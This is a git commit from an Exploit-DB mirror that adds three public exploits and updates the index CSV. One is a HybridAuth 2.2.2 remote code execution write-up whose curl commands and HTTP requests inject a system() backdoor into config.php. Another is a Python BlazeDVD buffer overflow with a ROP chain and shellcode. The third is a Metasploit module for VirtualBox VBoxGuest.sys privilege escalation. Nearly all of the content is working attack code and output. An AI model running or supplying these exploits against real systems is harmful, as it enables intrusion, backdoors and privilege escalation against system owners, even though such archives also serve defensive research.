bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions 1

Updated 08_15_2014

Browse source
This commit is contained in:
Offensive Security 2014-08-15 04:39:14 +00:00
parent 61b227234d
commit bb0719cd0a
4 changed files with 475 additions and 1 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

5
files.csv
View file

@ -17373,7 +17373,7 @@ id,file,description,date,author,platform,type,port
20060,platforms/linux/remote/20060.c,"BitchX IRC Client 75p1/75p3/1.0 c16 ""/INVITE"" Format String Vulnerability",2000-07-05,RaiSe,linux,remote,0
20061,platforms/linux/remote/20061.c,"Canna Canna 3.5 b2 Remote Buffer Overflow Vulnerability",2000-07-02,UNYUN,linux,remote,0
20062,platforms/php/webapps/20062.py,"AlienVault OSSIM 3.1 Reflected XSS and Blind SQL Injection",2012-07-23,muts,php,webapps,0
20063,platforms/windows/webapps/20063.txt,"spiceworks 5.3.75941 - Stored XSS and post-auth SQL Injection",2012-07-23,dookie,windows,webapps,0
20063,platforms/windows/webapps/20063.txt,"Spiceworks 5.3.75941 - Stored XSS and Post-Auth SQL Injection",2012-07-23,dookie,windows,webapps,0
20064,platforms/linux/remote/20064.py,"Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
20065,platforms/windows/remote/20065.txt,"DrPhibez and Nitro187 Guild FTPD 0.9.7 File Existence Disclosure Vulnerability",2000-07-08,"Andrew Lewis",windows,remote,0
20066,platforms/windows/remote/20066.java,"Michael Lamont Savant WebServer 2.1/3.0 - Buffer Overflow Vulnerability",2000-07-03,Wizdumb,windows,remote,0
@ -30871,6 +30871,7 @@ id,file,description,date,author,platform,type,port
34270,platforms/multiple/dos/34270.txt,"Ubisoft Ghost Recon Advanced Warfighter Integer Overflow and Array Indexing Overflow Vulnerabilities",2010-07-07,"Luigi Auriemma",multiple,dos,0
34271,platforms/multiple/remote/34271.txt,"id Software id Tech 4 Engine 'key' Packet Remote Code Execution Vulnerability",2010-07-05,"Luigi Auriemma",multiple,remote,0
34272,platforms/windows/local/34272.py,"Symantec Endpoint Protection 11.x, 12.x - Kernel Pool Overflow",2014-08-05,"ryujin & sickness",windows,local,0
34273,platforms/php/webapps/34273.txt,"HybridAuth 2.2.2 - Remote Code Execution",2014-08-06,@u0x,php,webapps,80
34275,platforms/php/webapps/34275.txt,"Pro Chat Rooms 8.2.0 - Multiple Vulnerabilities",2014-08-06,"Mike Manzotti",php,webapps,80
34278,platforms/linux/dos/34278.txt,"LibTIFF <= 3.9.4 - Out-Of-Order Tag Type Mismatch Remote Denial of Service Vulnerability",2010-07-12,"Tom Lane",linux,dos,0
34279,platforms/linux/dos/34279.txt,"LibTIFF <= 3.9.4 - Unknown Tag Second Pass Processing Remote Denial of Service Vulnerability",2010-06-14,"Tom Lane",linux,dos,0
@ -30918,3 +30919,5 @@ id,file,description,date,author,platform,type,port
34322,platforms/php/webapps/34322.txt,"phpwcms <= 1.4.5 'phpwcms.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34323,platforms/php/webapps/34323.html,"DSite CMS 4.81 'modmenu.php' Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34324,platforms/php/webapps/34324.txt,"FestOS 2.3 'contents' Parameter Cross Site Scripting Vulnerability",2010-07-15,"High-Tech Bridge SA",php,webapps,0
34331,platforms/windows/local/34331.py,"BlazeDVD Pro 7.0 - (.plf) Stack Based Buffer Overflow (Direct RET)",2014-08-12,"Giovanni Bartolomucci",windows,local,0
34333,platforms/windows/local/34333.rb,"VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation",2014-08-13,metasploit,windows,local,0

Can't render this file because it is too large.

197
platforms/php/webapps/34273.txt Executable file
View file

@ -0,0 +1,197 @@
######################################################################
# _ ___ _ _ ____ ____ _ _____
# | | / _ \| \ | |/ ___|/ ___| / \|_ _|
# | | | | | | \| | | _| | / _ \ | |
# | |__| |_| | |\ | |_| | |___ / ___ \| |
# |_____\___/|_| \_|\____|\____/_/ \_\_|
#
# HybridAuth <= 2.2.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.net/
# Exploit Author : @u0x (Pichaya Morimoto)
# Release dates : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################
[+] Description
============================================================
HybridAuth enable developers to easily build social applications to engage
websites
vistors and customers on a social level by implementing social signin,
social sharing,
users profiles, friends list, activities stream, status updates and more.
[+] Exploit (New Version)
============================================================
I just found that the latest development version (2.2.2-dev) in Github was
trying to patch this months ago.
https://github.com/hybridauth/hybridauth/commit/574953517cda02eb631d68879bbc4f203fd203b9#diff-7fa84e199bd97f30cea5aea71735379c
...
function stringSanitization($string)
{
$string = strip_tags($string);
$string = htmlentities($string, ENT_QUOTES, 'UTF-8');
return $string;
}
...
foreach( $_POST AS $k => $v ):
$v = stringSanitization($v); <--- sanitize ???
$k = stringSanitization($k); <--- sanitize ???
$z = "#$k#";
$CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
endforeach;
...
However, the sanitization is not sufficient to prevent PHP code injection.
We can inject to next value that will never be sanitized with
htmlentities() :/
Note that the default installation leave "install.php" untouched.
$ curl http://victim/hybridauth/install.php -d
'OPENID_ADAPTER_STATUS=system($_POST[0]))));/*'
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'
[+] Proof-of-Concept
============================================================
PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7
1. Inject Evil PHP Backdoor
POST /hybridauth_git/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 45
OPENID_ADAPTER_STATUS=system($_POST[0]))));/*
HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2467
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
<!DOCTYPE html>
<html lang="en">
<head>
<title>HybridAuth Installer</title>
...
2. Gaining access to the PHP backdoor
POST /hybridauth_git/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 14
0=id;ls%20-lha
HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 397
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 76K
drwxrwxrwx 3 longcat longcat 4.0K Aug 5 08:34 .
drwxrwxr-x 25 longcat longcat 16K Aug 5 08:47 ..
drwxrwxrwx 5 longcat longcat 4.0K Aug 5 08:34 Hybrid
- -rwxrwxrwx 1 longcat longcat 2.5K Aug 5 09:13 config.php
- -rwxrwxrwx 1 longcat longcat 488 Aug 5 08:34 index.php
- -rwxrwxrwx 1 longcat longcat 18K Aug 5 08:34 install.php
[+] Vulnerability Analysis
============================================================
Filename: ./install.php
...
function stringSanitization($string)
{
$string = strip_tags($string);
$string = htmlentities($string, ENT_QUOTES, 'UTF-8'); <-- LoL
return $string;
}
...
if( count( $_POST ) ): <-- user controlled input HTTP POST data
\/-- Read a template file
$CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl"
);
foreach( $_POST AS $k => $v ):
$v = stringSanitization($v);
$k = stringSanitization($k);
$z = "#$k#";
\/-- #POST data's keys# found in template file will be replaced
with POST data's values
| so we can simply replace these existing values with something
fun :)
$CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
endforeach;
...
\/-- upload that replaced template contents into config.php
$is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE .
"config.php", $CONFIG_TEMPLATE );
...
Filename: ./Hybrid/resources/config.php.tpl
...
return
array(
"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
"providers" => array (
// openid providers
"OpenID" => array (
"enabled" => #OPENID_ADAPTER_STATUS# <-- #..# will be
replaced with arbitrary PHP code
),
...
So this is what injected "config.php" looks like...
Filename: ./config.php
<?php
...
return
array(
"base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
"providers" => array (
// openid providers
"OpenID" => array (
"enabled" => system($_POST[0]))));/*
),
...
Pwned again,
LongCat

60
platforms/windows/local/34331.py Executable file
View file

@ -0,0 +1,60 @@
# BlazeDVD Pro v7.0 - (.plf) Stack Based Buffer Overflow (direct RET) - ALSR/DEP bypass on Win8.1 Pro
# Date: Mon, Aug 11 2014 12:58:06 GMT
# Exploit Author: Giovanni Bartolomucci
# Vendor Homepage: http://www.blazevideo.com/
# Software Link: http://www.blazevideo.com/download/BlazeDVDProSetup.exe
# Version: 7.0.0.0
# Tested on: Windows 8.1 Pro
# h/t to corelanc0d3r and b33f for their tutorials
#!/usr/bin/python
import sys, struct
file = "calc.plf"
junk1 = "\x41"*260
neweip = "\x5b\x51\x32\x60"
junk2 = "\x41"*24
rop = "\x41\x47\x32\x60" # POP EBP # RETN [Configuration.dll]
rop += "\xb5\x59\x33\x60" # &(PUSH ESP # RET 0x0C) [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RET [Configuration.dll]
rop += "\x91\x11\x11\x11" # Value to be subtracted, will become 0x000000080
rop += "\x39\x03\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\xda\x6d\x32\x60" # SUB EAX,ECX # RETN [Configuration.dll]
rop += "\x7d\x41\x32\x60" # XCHG EAX,EBX # XOR AL,60 # RETN [Configuration.dll]
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x47\x98\x31\x60" # Junk R address
rop += "\x47\x98\x31\x60" # POP EDX # ADD AL,BYTE PTR ES:[EAX] # NOP # NOP # NOP # NOP # NOP # MOV EAX,Configur.60346A70 # RETN [Configuration.dll]
rop += "\x51\x11\x11\x11" # Value to be subtracted, will become 0x000000040
rop += "\xf6\x07\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x11\x11\x11\x11" # Value to subtract
rop += "\x78\x8b\x30\x60" # SUB EDX,EAX # XOR EAX,EAX # CMP ECX,EDX # SETG AL # RETN 0x04 [Configuration.dll]
rop += "\x8c\xf0\x33\x60" # POP ECX # RETN [Configuration.dll]
rop += "\x41\x41\x41\x41" # Junk
rop += "\x0b\x17\x36\x60" # & Writable location [Configuration.dll]
rop += "\xee\x78\x32\x60" # POP EDI # RETN [Configuration.dll]
rop += "\x09\x48\x32\x60" # RETN (ROP NOP) [Configuration.dll]
rop += "\x65\x08\x33\x60" # POP EAX # RETN [Configuration.dll]
rop += "\xcc\x42\x05\x64" # ptr to &VirtualProtect() [IAT MediaPlayerCtrl.dll]
rop += "\xed\xd6\x33\x60" # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll]
rop += "\xa2\x92\x32\x60" # POP EAX # RETN [Configuration.dll]
rop += "\x90\x90\x90\x90" # NOP
rop += "\x28\xc3\x33\x60" # PUSHAD # RETN [Configuration.dll]
shellcode = ("\x66\x81\xE4\xFC\xFF\x31\xD2\x52\x68\x63"
"\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
"\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30"
"\x8B\x7E\x18\x8B\x5F\x3C\x8B\x5C\x1F\x78"
"\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
"\x01\xF9\x42\xAD\x81\x3C\x07\x57\x69\x6E"
"\x45\x75\xF5\x0F\xB7\x54\x51\xFE\x8B\x74"
"\x1F\x1C\x01\xFE\x03\x3C\x96\xFF\xD7\xCC")
exploit = junk1 + neweip + junk2 + rop + shellcode
writeFile = open(file, "w")
writeFile.write(exploit)
writeFile.close()

214
platforms/windows/local/34333.rb Executable file
View file

@ -0,0 +1,214 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/exploit/local/windows_kernel'
require 'rex'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Exploit::Local::WindowsKernel
include Msf::Post::File
include Msf::Post::Windows::FileInfo
include Msf::Post::Windows::Priv
include Msf::Post::Windows::Process
def initialize(info={})
super(update_info(info, {
'Name' => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
'Description' => %q{
A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
control into an arbitrary location they define. This can be used by an attacker to
overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
Additions up to 4.3.10r93012.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
'Jay Smith <jsmith[at]korelogic.com>' # MSF module
],
'Arch' => ARCH_X86,
'Platform' => 'win',
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Targets' =>
[
['Windows XP SP3',
{
'HaliQuerySystemInfo' => 0x16bba,
'_KPROCESS' => "\x44",
'_TOKEN' => "\xc8",
'_UPID' => "\x84",
'_APLINKS' => "\x88"
}
]
],
'References' =>
[
['CVE', '2014-2477'],
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
],
'DisclosureDate'=> 'Jul 15 2014',
'DefaultTarget' => 0
}))
end
def fill_memory(proc, address, length, content)
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack("L"), nil, [ length ].pack("L"), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
if not proc.memory.writable?(address)
vprint_error("Failed to allocate memory")
return nil
else
vprint_good("#{address} is now writable")
end
result = proc.memory.write(address, content)
if result.nil?
vprint_error("Failed to write contents to memory")
return nil
else
vprint_good("Contents successfully written to 0x#{address.to_s(16)}")
end
return address
end
def check
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
return Exploit::CheckCode::Safe
end
handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?
return Exploit::CheckCode::Safe
end
session.railgun.kernel32.CloseHandle(handle)
os = sysinfo["OS"]
unless (os =~ /windows xp.*service pack 3/i)
return Exploit::CheckCode::Safe
end
file_path = expand_path("%windir%") << "\\system32\\drivers\\vboxguest.sys"
unless file?(file_path)
return Exploit::CheckCode::Unknown
end
major, minor, build, revision, branch = file_version(file_path)
vprint_status("vboxguest.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
unless (major == 4)
return Exploit::CheckCode::Safe
end
case minor
when 0
return Exploit::CheckCode::Vulnerable if build < 26
when 1
return Exploit::CheckCode::Vulnerable if build < 34
when 2
return Exploit::CheckCode::Vulnerable if build < 26
when 3
return Exploit::CheckCode::Vulnerable if build < 12
end
return Exploit::CheckCode::Safe
end
def exploit
if is_system?
fail_with(Exploit::Failure::None, 'Session is already elevated')
end
if sysinfo["Architecture"] =~ /wow64/i
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
elsif sysinfo["Architecture"] =~ /x64/
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
end
unless check == Exploit::CheckCode::Vulnerable
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
end
handle = open_device('\\\\.\\vboxguest', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
if handle.nil?
fail_with(Failure::NoTarget, "Unable to open \\\\.\\vboxguest device")
end
print_status("Disclosing the HalDispatchTable address...")
hal_dispatch_table = find_haldispatchtable
if hal_dispatch_table.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Filed to disclose HalDispatchTable")
else
print_good("Address successfully disclosed.")
end
print_status('Getting the hal.dll base address...')
hal_info = find_sys_base('hal.dll')
fail_with(Failure::Unknown, 'Failed to disclose hal.dll base address') if hal_info.nil?
hal_base = hal_info[0]
print_good("hal.dll base address disclosed at 0x#{hal_base.to_s(16).rjust(8, '0')}")
hali_query_system_information = hal_base + target['HaliQuerySystemInfo']
print_status("Storing the shellcode in memory...")
this_proc = session.sys.process.open
restore_ptrs = "\x31\xc0" # xor eax, eax
restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V') # mov dword ptr [nt!HalDispatchTable+0x4], eax
kernel_shell = token_stealing_shellcode(target)
kernel_shell_address = 0x1
buf = "\x90" * 0x6000
buf[0, 56] = "\x50\x00\x00\x00" * 14
buf[0x5000, kernel_shell.length] = restore_ptrs + kernel_shell
result = fill_memory(this_proc, kernel_shell_address, buf.length, buf)
if result.nil?
session.railgun.kernel32.CloseHandle(handle)
fail_with(Failure::Unknown, "Error while storing the kernel stager shellcode on memory")
else
print_good("Kernel stager successfully stored at 0x#{kernel_shell_address.to_s(16)}")
end
print_status("Triggering the vulnerability, corrupting the HalDispatchTable...")
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x22a040, 0x1, 140, hal_dispatch_table + 0x4 - 40, 0)
session.railgun.kernel32.CloseHandle(handle)
print_status("Executing the Kernel Stager throw NtQueryIntervalProfile()...")
session.railgun.ntdll.NtQueryIntervalProfile(2, 4)
print_status("Checking privileges after exploitation...")
unless is_system?
fail_with(Failure::Unknown, "The exploitation wasn't successful")
else
print_good("Exploitation successful!")
end
p = payload.encoded
print_status("Injecting #{p.length.to_s} bytes to memory and executing it...")
if execute_shellcode(p)
print_good("Enjoy")
else
fail_with(Failure::Unknown, "Error while executing the payload")
end
end
end